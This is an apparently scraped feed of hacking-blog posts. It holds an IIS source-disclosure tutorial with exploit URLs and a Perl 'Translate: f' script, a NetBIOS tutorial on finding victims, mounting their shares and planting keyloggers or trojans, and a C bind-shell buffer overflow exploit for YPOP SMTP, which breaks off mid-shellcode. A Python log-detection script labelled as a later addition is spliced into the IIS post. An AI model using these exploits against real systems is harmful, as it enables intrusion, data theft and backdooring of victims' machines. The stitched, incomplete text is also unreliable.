Microsoft Windows NT Server's IIS versions 1.0, 2.0, 3.0 and 4.0 are affected by this vulnerability.&lt;br /&gt;Microsoft has produced a hotfix for IIS versions 3.0 and 4.0. The fix involves IIS "supporting NTFS alternate data streams by asking Windows NT to make the file name canonical", according to Microsoft.&lt;br /&gt;To view or get the source of an .asp file, type the following from your browser:&lt;br /&gt;http://www.victim.com/default.asp::$DATA&lt;br /&gt;and you will get the source code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=========ASP Dot Bug====================&lt;br /&gt;The famous L0pht group discovered the ASP dot bug in 1997. The vulnerability involved being able to reveal ASP source code to attackers. By appending one or more dots to the end of an ASP URL under IIS 3.0, it was possible to view the ASP source code.&lt;br /&gt;The exploit worked by appending a dot to the end of an ASP URL as follows:&lt;br /&gt;http://www.victim.com/sample.asp.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;======ISM.DLL Buffer Truncation===============&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This bug was found by the Cerberus Information Security team. It affects IIS 4.0 and 5.0 and allows attackers to view the content of files and the source code of scripts.&lt;br /&gt;By making a specially formed request to IIS, with the name of the file and then appending around 230 + “ %20 “ (these represent spaces) and then appending “ .htr ”, this tricks IIS into thinking that the client is requesting a “ .htr “ file. The .htr file extension is mapped to the ISM.DLL ISAPI application and IIS redirects all requests for .htr resources to this DLL. 
&lt;br /&gt;ISM.DLL is then passed the name of the file to open and execute, but before doing this ISM.DLL truncates the buffer sent to it, chopping off the .htr and a few spaces, and ends up opening the file we want to get the source of. The contents are then returned.&lt;br /&gt;This attack can only be launched once though, unless the web service is stopped and started. It will only work when ISM.DLL is first loaded into memory.&lt;br /&gt;An attacker can view the source of global.asa, for instance, as follows:&lt;br /&gt;http://www.victim.com/global.asa%20%20(...&lt;=230)global.asa.htr&lt;br /&gt;will reveal the source of global.asa.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;==========.idc &amp; .ida Bugs=======================&lt;br /&gt;This exploit is actually similar to the ASP dot bug; however, this time we get the path of the web directory on IIS 4.0. I have even seen this bug working on IIS 5.0 on my pen-tests. Adding an “.idc” or “.ida” extension to the end of the URL will cause IIS installations to try to run the so-called .IDC through the database connector .DLL. If the .idc doesn't exist, then it will return rather informative output about the server.&lt;br /&gt;http://www.victim.com/anything.idc or anything.idq&lt;br /&gt;you will get the path.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;============+.htr Bug===========================&lt;br /&gt;This exploit is also ever so similar to the ASP dot bug, and you can get the source code of ASA and ASP files by appending a +.htr to the URL of asp and asa files. 
&lt;br /&gt;http://www.victim.com/global.asa+.htr &lt;br /&gt;you may get the source code to browse &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;===========NT Site Server Adsamples Vulnerability ====== &lt;br /&gt;By requesting site.csc, which is normally located in /adsamples/config/site.csc, the attacker may be able to retrieve the DSN, UID and PASS of the database, as this file may contain them. &lt;br /&gt;By typing the following &lt;br /&gt;http://www.victim.com/adsamples/config/site.csc &lt;br /&gt;the attacker will download the file site.csc and (s)he can get some important data. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;==========Password Attack to User Accounts=========== &lt;br /&gt;IIS 4.0 has an interesting feature that can allow a remote attacker to attack user accounts local to the web server as well as on other machines across the internet. Added to this, if your web server is behind a firewall performing NAT (network address translation), machines on the inside could be attacked as well. &lt;br /&gt;By default every install of IIS 4.0 creates a virtual directory "/iisadmpwd". This directory contains a number of .htr files. Anonymous users are allowed to access these files; they are not restricted to the loopback address (127.0.0.1). The following is a list of files found in the /iisadmpwd directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd &lt;br /&gt;Achg.htr &lt;br /&gt;Aexp.htr &lt;br /&gt;Aexp2.htr &lt;br /&gt;Aexp2b.htr &lt;br /&gt;Aexp3.htr &lt;br /&gt;Aexp4.htr &lt;br /&gt;Aexp4b.htr &lt;br /&gt;Anot.htr &lt;br /&gt;Anot3.htr &lt;br /&gt;These files are variants of the same file and allow a user to change their password via the web. They can also be used to enumerate valid accounts through guesswork. 
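As an added, defender-side example that is not part of the original paper, the following Python flags logged requests that match the source-disclosure tricks described in this paper, including the Translate: f header covered in the next section. The request records, client addresses, rule names and the 200-sequence threshold for the %20 run are all constructed or assumed here, and it is assumed that the Translate header is logged (IIS W3C logs do not record it by default, so a reverse proxy or custom logging would have to supply it):

```python
"""Flag web requests that match the IIS source-disclosure tricks this paper describes.

Added example, not part of the original paper. The request records below are
constructed (documentation-range client addresses). Paths are the raw request
target as sent, before URL decoding, so "%20" runs and "::$DATA" are preserved.
"""
import re

# The paper says "around 230" "%20" sequences for the ISM.DLL truncation
# request; 200 is an assumed margin that still never fires on a normal URL.
MIN_SPACE_RUN = 200

ASP_TRAILING_DOT = re.compile(r"\.as[ap]\.+$", re.I)          # /sample.asp.
PLUS_HTR = re.compile(r"\.as[ap]\+\.htr$", re.I)              # /global.asa+.htr
SPACE_RUN_HTR = re.compile(                                   # name, %20 run, .htr
    r"(?:%20){" + str(MIN_SPACE_RUN) + r",}.*\.htr$", re.I)
IDC_IDA = re.compile(r"\.id[acq]$", re.I)                     # /anything.idc|ida|idq

# (rule name, test). Each test receives the raw path and a dict of request
# headers whose names have been lower-cased.
RULES = [
    # NTFS alternate data stream suffix: /default.asp::$DATA
    ("ntfs-ads-data", lambda path, hdrs: path.lower().endswith("::$data")),
    # ASP dot bug: one or more trailing dots after .asp/.asa
    ("asp-trailing-dot", lambda path, hdrs: ASP_TRAILING_DOT.search(path) is not None),
    # +.htr bug
    ("plus-htr", lambda path, hdrs: PLUS_HTR.search(path) is not None),
    # ISM.DLL buffer truncation
    ("ism-dll-truncation", lambda path, hdrs: SPACE_RUN_HTR.search(path) is not None),
    # .idc/.ida/.idq probes; legitimate IDC applications also match this one,
    # so correlate it with an error response before acting on it.
    ("idc-ida-probe", lambda path, hdrs: IDC_IDA.search(path) is not None),
    # Site Server sample config that may hold the database DSN, UID and PASS
    ("adsamples-site-csc", lambda path, hdrs: "/adsamples/config/site.csc" in path.lower()),
    # password-change .htr pages reachable by anonymous users
    ("iisadmpwd-access", lambda path, hdrs: "/iisadmpwd/" in path.lower()),
    # WebDAV "Translate: f" request header (header names are case-insensitive)
    ("translate-f-header", lambda path, hdrs: hdrs.get("translate", "").strip().lower() == "f"),
]


def normalize_headers(headers):
    """Lower-case header names so Translate, translate and TRANSLATE all match."""
    return {name.lower(): value for name, value in (headers or {}).items()}


def classify_request(path, headers=None):
    """Return the names of every rule the request trips (empty list if clean)."""
    hdrs = normalize_headers(headers)
    return [name for name, test in RULES if test(path, hdrs)]


def summarize(records):
    """Map each client address to the sorted list of rules it tripped."""
    hits = {}
    for rec in records:
        matched = classify_request(rec["path"], rec.get("headers"))
        if matched:
            hits.setdefault(rec["client"], set()).update(matched)
    return {client: sorted(names) for client, names in hits.items()}


# Constructed sample traffic: one request per trick plus two benign requests.
SAMPLE_REQUESTS = [
    {"client": "198.51.100.7", "path": "/default.asp::$DATA"},
    {"client": "198.51.100.7", "path": "/sample.asp."},
    {"client": "198.51.100.7", "path": "/global.asa+.htr"},
    {"client": "198.51.100.8", "path": "/global.asa" + "%20" * 230 + "global.asa.htr"},
    {"client": "198.51.100.8", "path": "/anything.ida"},
    {"client": "198.51.100.9", "path": "/adsamples/config/site.csc"},
    {"client": "198.51.100.9", "path": "/iisadmpwd/aexp.htr"},
    {"client": "198.51.100.10", "path": "/login.asp/", "headers": {"Translate": "f"}},
    {"client": "192.0.2.5", "path": "/default.asp"},
    {"client": "192.0.2.5", "path": "/index.htm", "headers": {"Accept": "*/*"}},
]

if __name__ == "__main__":
    for client, names in summarize(SAMPLE_REQUESTS).items():
        print(client, ", ".join(names))
```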
&lt;br /&gt;If the user account does not exist, a message will be returned saying "invalid domain". &lt;br /&gt;If the account exists but the password is wrong, then the message will say so. &lt;br /&gt;If an IP address followed by a backslash precedes the account name, then the IIS server will contact the remote machine over the NetBIOS session port 139 and attempt to change the user's password (x.x.x.x\ACCOUNTNAME). &lt;br /&gt;Therefore, if you do not need this service, remove the /iisadmpwd directory. This will prevent these attacks. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;=============Translate:f Bug ==================== &lt;br /&gt;Daniel Docekal brought this issue to BugTraq this summer, on August 15, 2000 (www.securityfocus.com/bid/1578). The actual problem is with the WebDAV implementation in Office 2000 and FrontPage 2000 Server Extensions. &lt;br /&gt;When someone makes a request for an ASP/ASA or any other scriptable page and adds "Translate: f" to the headers of the HTTP GET (headers are not part of the URL; they are part of the HTTP request), they get the complete ASP/ASA source code on Win2K without SP1 installed. &lt;br /&gt;Translate: f is a legitimate header for WebDAV and is used by WebDAV compatible clients and by FP2000 to get the file for editing. &lt;br /&gt;Simply adding "Translate: f" and placing "/" at the end of the request path in an HTTP GET triggers the security bug. &lt;br /&gt;It is a Win2K bug, but because FP2000 can be installed on IIS 4.0, it is also an IIS 4.0 bug. &lt;br /&gt;You can use the following perl script to use this exploit. 
&lt;br /&gt;############################# &lt;br /&gt;use IO::Socket; # &lt;br /&gt;my ($port, $sock,$server); # &lt;br /&gt;$size=0; # &lt;br /&gt;############################# &lt;br /&gt;# &lt;br /&gt;$server="$ARGV[0]"; &lt;br /&gt;$s="$server"; &lt;br /&gt;$port="80"; &lt;br /&gt;$cm="$ARGV[1]"; &lt;br /&gt;&amp;connect; &lt;br /&gt;sub connect { &lt;br /&gt;if ($#ARGV &lt; 1) { &lt;br /&gt;howto(); &lt;br /&gt;exit; &lt;br /&gt;} &lt;br /&gt;$ver="GET /$cm%5C HTTP/1.0 &lt;br /&gt;Host: $server &lt;br /&gt;Accept: */* &lt;br /&gt;Translate: f &lt;br /&gt;\n\n"; &lt;br /&gt;my($iaddr,$paddr,$proto); &lt;br /&gt;$iaddr = inet_aton($server) || die "Error: $!"; &lt;br /&gt;$paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; &lt;br /&gt;$proto = getprotobyname('tcp') || die "Error: $!"; &lt;br /&gt;socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: &lt;br /&gt;$!"; &lt;br /&gt;connect(SOCK, $paddr) || die "Error: $!"; &lt;br /&gt;send(SOCK, $ver, 0) || die "Can't send packet: $!"; &lt;br /&gt;open(OUT, "&gt;$server.txt"); &lt;br /&gt;print "Dumping $cm to $server.txt \n"; &lt;br /&gt;while(&lt;SOCK&gt;) { &lt;br /&gt;print OUT &lt;SOCK&gt;; &lt;br /&gt;} &lt;br /&gt;sub howto { &lt;br /&gt;print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n"; &lt;br /&gt;} &lt;br /&gt;close OUT; &lt;br /&gt;$n=0; &lt;br /&gt;$type=2; &lt;br /&gt;close(SOCK); &lt;br /&gt;exit(1); &lt;br /&gt;} &lt;br /&gt;If we save the script as Trans.pl, then we can get ASA/ASP source code as follows &lt;br /&gt;Trans.pl www.victim.com codetoview.asp &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And there you go, you get the source code of codetoview.asp. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;04- Conclusion &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;All the information I have given you has been widely used in the wild. However, what I tried to do was just to collect all this information together to check the security of our famous IIS 4.0 and 5.0. 
Whenever I encounter an IIS web server during my pen-tests, I check for these vulnerabilities, and most of the time one of them works. &lt;br /&gt;I hope that what I have written has helped you in some way. Thanks for reading it; please continue to support me as I continue to release this sort of paper. If you want to learn more, please check the mentioned people's web sites for more details, and you can even write to me. &lt;br /&gt;Peace in mind &lt;br /&gt;Watch your servers in the wild</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/6759228808617507709/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=6759228808617507709' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6759228808617507709'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6759228808617507709'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/hacking-iis-tutorial.html' title='Hacking iis tutorial'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-2042527636790514870</id><published>2007-12-02T01:15:00.001-08:00</published><updated>2007-12-02T01:15:58.257-08:00</updated><title 
type='text'>Net bios hacking</title><content type='html'>Decided to put this here instead of windows because it really is for beginners.&lt;br /&gt;&lt;br /&gt;NETBIOS BASED HACKING TUTORIAL BY GAURAV KUMAR &lt;br /&gt;&lt;br /&gt;gkverma@msn.com&lt;br /&gt;&lt;br /&gt;Preface &lt;br /&gt;&lt;br /&gt;Dear reader, I have written this tutorial keeping in mind that readers having only basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is probably the easiest way to hack remotely. I strongly oppose hacking, but not ethical hacking. An ethical hacker is one who hacks computer networks not for anti-social reasons but to let the network administrators know about the security holes so that they can prevent their computers from being hacked. If you want to contact me please send a mail to gaurav@sec33.com &lt;br /&gt;&lt;br /&gt;Contents- &lt;br /&gt;&lt;br /&gt;A brief lesson on NetBIOS &lt;br /&gt;&lt;br /&gt;The NBTSTAT command &lt;br /&gt;&lt;br /&gt;What you need to hack 
&lt;br /&gt;&lt;br /&gt;Types of attacks &lt;br /&gt;&lt;br /&gt;Searching for a victim &lt;br /&gt;&lt;br /&gt;Lets Hack - Part 1 Remotely reading/writing to a victim's computer &lt;br /&gt;&lt;br /&gt;Cracking "Share" passwords &lt;br /&gt;&lt;br /&gt;Using IPC$ to hack Windows NT &lt;br /&gt;&lt;br /&gt;Penetrating into the victim's computer &lt;br /&gt;&lt;br /&gt;Lets Hack - Part 2 Denial of service attack &lt;br /&gt;&lt;br /&gt;How to protect yourself &lt;br /&gt;&lt;br /&gt;_______________________________________________________________________________&lt;br /&gt;&lt;br /&gt;A BRIEF LESSON ON NETBIOS &lt;br /&gt;&lt;br /&gt;NetBIOS stands for Network Basic Input Output System. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows operating systems (like Windows 98, Windows Me, Windows NT etc.), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computers. Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network by issuing a command to NetBIOS. NetBIOS gives the names of the computers that have been registered. In short, NetBIOS gives various information about the computers on a network. These include- &lt;br /&gt;&lt;br /&gt;Name of the computer &lt;br /&gt;&lt;br /&gt;Username &lt;br /&gt;&lt;br /&gt;Domain &lt;br /&gt;&lt;br /&gt;Computer Name &lt;br /&gt;&lt;br /&gt;and many others. &lt;br /&gt;&lt;br /&gt;Like any other service it also works on a port. It has been assigned port number 139. 
&lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;THE NBTSTAT COMMAND &lt;br /&gt;&lt;br /&gt;You can manually interact with NetBIOS with the help of the NBTSTAT command. To use this command click on the Start button, then select RUN... and type "command" without quotes to launch the MS-DOS Command Prompt. Alternatively you may click on the Start button, then go to Programs and then select Command Prompt. Once you are in the Command Prompt you can exit by typing the command EXIT. To launch the Command Prompt in full screen mode press the ALT+ENTER key combination; to get back to the original window press ALT+ENTER again. If you have launched the command prompt you will get &lt;br /&gt;&lt;br /&gt;c:\windows&gt; &lt;br /&gt;&lt;br /&gt;If you do not get "windows" displayed after c:\ don't worry, just keep going; all required commands will work fine. &lt;br /&gt;&lt;br /&gt;Now let's play with the NBTSTAT command. &lt;br /&gt;&lt;br /&gt;If you want to get more help from MS-DOS about this command type NBTSTAT/? at the prompt, i.e. &lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat/? &lt;br /&gt;&lt;br /&gt;If you want to get the NetBIOS information of your own computer type the following command &lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a 127.0.0.1 &lt;br /&gt;&lt;br /&gt;This command will list the NetBIOS information. 
A typical example &lt;br /&gt;&lt;br /&gt;NetBIOS Remote Machine Name Table &lt;br /&gt;&lt;br /&gt;Name   Number   Type   Usage &lt;br /&gt;&lt;br /&gt;========================================================================== &lt;br /&gt;&lt;br /&gt;workgroup   00   G   Domain Name &lt;br /&gt;&lt;br /&gt;my_computer   03   U   Messenger Service &lt;br /&gt;&lt;br /&gt;myusername   03   U   Messenger Service &lt;br /&gt;&lt;br /&gt;MAC Address = 00-02-44-14-23-E6 &lt;br /&gt;&lt;br /&gt;Please note that we have used our ip address as 127.0.0.1. This ip address is called the "Loop Back" ip address because it always refers to the computer you are using. &lt;br /&gt;&lt;br /&gt;This example is self explanatory; we need not go into details. We need to know about the Name and Number. The Name column displays the NetBIOS name and there is a corresponding hexadecimal number. You may see some additional names in your case. &lt;br /&gt;&lt;br /&gt;If you want to get the NetBIOS names of a remote computer, the command is &lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a ipaddress &lt;br /&gt;&lt;br /&gt;Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command &lt;br /&gt;&lt;br /&gt;NOTE - 203.195.136.156 may be an active ip address of someone's computer. I am using it only as an example. Please don't hack this computer. 
&lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a 203.195.136.156 &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;WHAT YOU NEED TO HACK &lt;br /&gt;&lt;br /&gt;All you need is a Windows based operating system like Windows 98 or Me (but I prefer Windows NT, 2000, XP) and an internet connection. &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;TYPES OF ATTACKS &lt;br /&gt;&lt;br /&gt;We can launch two types of attack on a remote computer having NetBIOS. &lt;br /&gt;&lt;br /&gt;1. Reading/Writing to a remote computer system &lt;br /&gt;&lt;br /&gt;2. Denial of Service &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;Searching for a victim &lt;br /&gt;&lt;br /&gt;You may manually search for victims by first using nbtstat -a ipaddress and then net view \\ipaddress. If at first you don't succeed, step to the next ip address until you find a suitable one. You may also use a port scanner. A port scanner is simply a piece of software that can search a block of ip addresses, say 192.168.0.1 to 192.168.0.255, for one or more open ports. "Orge" is a port scanner that gives the NetBIOS names of remote computers. 
&lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;Lets Hack - Part 1 Remotely reading/writing to a victim's computer &lt;br /&gt;&lt;br /&gt;Believe it or not, NetBIOS is the easiest method to break into somebody's computer. However, there is a condition that must be satisfied before you can hack: the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it, the nbtstat command will display one more NetBIOS name. Now let us take an example. Suppose you know an ip address that has File And Printer Sharing enabled, and let us suppose the ip address happens to be 203.195.136.156. &lt;br /&gt;&lt;br /&gt;If you don't know an ip address where File and Printer Sharing is enabled, read "Searching for a victim". &lt;br /&gt;&lt;br /&gt;The command that you will use to view the NetBIOS names is &lt;br /&gt;&lt;br /&gt;c:\windows&gt;nbtstat -a 203.195.136.156 &lt;br /&gt;&lt;br /&gt;Let us suppose that the output comes out to be &lt;br /&gt;&lt;br /&gt;NetBIOS Remote Machine Name Table &lt;br /&gt;&lt;br /&gt;Name   Type   Status &lt;br /&gt;------------------------------------------------------------------------------------------------- &lt;br /&gt;user   &lt;00&gt;   UNIQUE   Registered &lt;br /&gt;workgroup   &lt;00&gt;   GROUP   Registered &lt;br /&gt;user   &lt;03&gt;   UNIQUE   Registered &lt;br /&gt;user   &lt;20&gt;   UNIQUE   Registered &lt;br /&gt;&lt;br /&gt;MAC Address = 00-02-44-14-23-E6 &lt;br /&gt;&lt;br /&gt;The number &lt;20&gt; shows that the victim has enabled File And Printer Sharing. 
&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------------------------------------------------------------------------------------------- &lt;br /&gt;&lt;br /&gt;NOTE - If you do not get this number there are two possibilities &lt;br /&gt;&lt;br /&gt;1. You do not get the number &lt;20&gt;. This shows that the victim has not enabled File And Printer Sharing. &lt;br /&gt;&lt;br /&gt;2. You get "Host Not found". This shows that port 139 is closed or the ip address doesn't exist. &lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------------------------- &lt;br /&gt;&lt;br /&gt;Now our next step would be to view the drives or folders the victim is sharing. &lt;br /&gt;&lt;br /&gt;We will use the command &lt;br /&gt;&lt;br /&gt;c:\windows&gt;net view \\203.195.136.156 &lt;br /&gt;&lt;br /&gt;Let us suppose we get the following output &lt;br /&gt;&lt;br /&gt;Shared resources at \\203.195.136.156 &lt;br /&gt;ComputerNameGoesHere &lt;br /&gt;&lt;br /&gt;Share name   Type   Used as   Comment &lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------------------------- &lt;br /&gt;CDISK   Disk &lt;br /&gt;&lt;br /&gt;The command completed successfully. &lt;br /&gt;&lt;br /&gt;"Disk" shows that the victim is sharing a disk named CDISK. 
You may also get some additional information like &lt;br /&gt;&lt;br /&gt;Shared resources at \\203.195.136.156 &lt;br /&gt;&lt;br /&gt;ComputerNameGoesHere &lt;br /&gt;&lt;br /&gt;Share name   Type   Used as   Comment &lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------------------------- &lt;br /&gt;HP-6L   Print &lt;br /&gt;&lt;br /&gt;"Print" shows that the victim is sharing a printer named HP-6L &lt;br /&gt;&lt;br /&gt;If we are able to connect to the victim's hard disks, folders or printers, we will be able to read and write to those folders or hard disks, or we may even be able to print on the remote printer! Now let us connect to the victim's hard disk or printer. &lt;br /&gt;&lt;br /&gt;Till now we know that there is a computer whose ip address happens to be 203.195.136.156, that File and Printer Sharing is enabled on that computer, and that the victim's shared hard disk is named CDISK. &lt;br /&gt;&lt;br /&gt;Now we will connect our computer to that hard disk. After we have connected successfully a drive will be created on our computer, and on double clicking it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK, our drive will have the same contents as CDISK. &lt;br /&gt;&lt;br /&gt;Let's do it. &lt;br /&gt;&lt;br /&gt;We will use the NET command to do our work. &lt;br /&gt;&lt;br /&gt;Let us suppose we want to make a drive k: on our computer and connect it to the victim's share; we will issue the command &lt;br /&gt;&lt;br /&gt;c:\windows&gt;net use k: \\203.195.136.156\CDISK &lt;br /&gt;&lt;br /&gt;You may replace the letter k with any other letter. 
&lt;br /&gt;&lt;br /&gt;If the command is successful we will get the confirmation &lt;br /&gt;&lt;br /&gt;The command was completed successfully &lt;br /&gt;&lt;br /&gt;Now just double click on the My Computer icon on your desktop and you will be a happy hacker! &lt;br /&gt;&lt;br /&gt;We have just created a new drive k:. Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack! &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;Cracking Share passwords &lt;br /&gt;&lt;br /&gt;Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker, "PQWAK". All you have to do is enter the ip address and the share name and it will decrypt the password within seconds. Please note that this can crack the passwords only if the remote operating system is one of - &lt;br /&gt;&lt;br /&gt;Windows 95 &lt;br /&gt;&lt;br /&gt;Windows 98 &lt;br /&gt;&lt;br /&gt;Windows Me &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;Using IPC$ to hack Windows NT, 2000, XP &lt;br /&gt;&lt;br /&gt;Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000. &lt;br /&gt;&lt;br /&gt;IPC$ is there to help us. It is not a password cracker at all. It is simply a string that tells the remote operating system to give guest access, that is, access without asking for a password. 
&lt;br /&gt;&lt;br /&gt;We hackers use IPC$ in this way &lt;br /&gt;&lt;br /&gt;c:\windows&gt;net use k: \\123.123.123.123\ipc$ "" /user:"" &lt;br /&gt;&lt;br /&gt;You may replace the letter k with any other letter. If you replace it with "b" (type without quotes) a new drive will be created with drive letter b. &lt;br /&gt;&lt;br /&gt;Please note that you won't be able to get access to the victim's shared drives, but you can gather valuable information like the names of all the users, users that have never logged on, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - it's my favorite tool; however, it runs from the command prompt. &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;Penetrating into the victim's computer &lt;br /&gt;&lt;br /&gt;Now that you have access to a remote computer you may be interested in viewing his secret emails, downloading his mp3 songs, and more... &lt;br /&gt;&lt;br /&gt;But if you think like a hard core hacker you would like to play some dirty tricks: you may wish to install a key logger, install a back door Trojan like netbus or backorifice, or delete or copy some files. All these tasks involve writing to the victim's hard disk. For this you need to have write access permission. &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;Lets Hack - Part 2 Denial of service attack &lt;br /&gt;&lt;br /&gt;This type of attack is meant to be launched by computer techies, because it involves using the Linux operating system and compiling C language files. 
To exploit these vulnerabilities you have to copy exploit code from sites like neworder, securityfocus etc. and compile it. &lt;br /&gt;&lt;br /&gt;The two most common vulnerabilities found in NetBIOS are &lt;br /&gt;&lt;br /&gt;Vulnerability 1 &lt;br /&gt;&lt;br /&gt;Vulnerability 2 &lt;br /&gt;&lt;br /&gt;Another vulnerability that has been found recently is that one can launch a DoS attack against Windows NT, 2000, XP and .NET systems. For detailed information and the patch please visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp. &lt;br /&gt;I have checked my web servers that are still vulnerable to this type of attack. &lt;br /&gt;&lt;br /&gt;________________________________________________________________________________&lt;br /&gt;&lt;br /&gt;How to protect yourself &lt;br /&gt;&lt;br /&gt;Please visit windowsupdate.microsoft.com and let Windows update itself.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/2042527636790514870/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=2042527636790514870' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2042527636790514870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/2042527636790514870'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/net-bios-hacking.html' title='Net 
hacking'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3992605583603693354</id><published>2007-12-02T01:12:00.000-08:00</published><updated>2007-12-02T01:15:17.829-08:00</updated><title type='text'>Ypop Smtp Remote Buffer Overflow Exploit</title><content type='html'>The Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;Telnet localhost 25&lt;br /&gt;220 YahooPOPs! Simple Mail Transfer Service Ready&lt;br /&gt;504xA CODE&lt;br /&gt;&lt;br /&gt;The EIP register will be overwritten and our code will be executed&lt;br /&gt;here is a little exploit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;&lt;br /&gt;/*-= ---------------------------------- =-&lt;br /&gt;* = YPOP SMTP Remote Buffer Overflow =&lt;br /&gt;* = BindShell Exploit by cyrex =&lt;br /&gt;* = Tested on Win2k SP4 =&lt;br /&gt;*-= ---------------------------------- =-&lt;br /&gt;* = Info: =&lt;br /&gt;* = If you need more offsets you need =&lt;br /&gt;* = to get the JMP Address of =&lt;br /&gt;* = libcurl.dll and the return address =&lt;br /&gt;* = of it. Try your luck. 
=&lt;br /&gt;*-= ---------------------------------- =-&lt;br /&gt;* = Usage: =&lt;br /&gt;* = ./ypop -h &lt;hostname&gt;=&lt;br /&gt;*-= ---------------------------------- =-&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;stdarg.h&gt;&lt;br /&gt;#include &lt;netdb.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;sys&gt;&lt;br /&gt;#include &lt;sys&gt;&lt;br /&gt;#include &lt;netinet&gt;&lt;br /&gt;&lt;br /&gt;//;W32 BindShellcode by cyrex&lt;br /&gt;//;Listen on port 4567&lt;br /&gt;//;uses exit thread&lt;br /&gt;&lt;br /&gt;unsigned char shellcode[] =&lt;br /&gt;"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"&lt;br /&gt;"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"&lt;br /&gt;"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"&lt;br /&gt;"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"&lt;br /&gt;"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"&lt;br 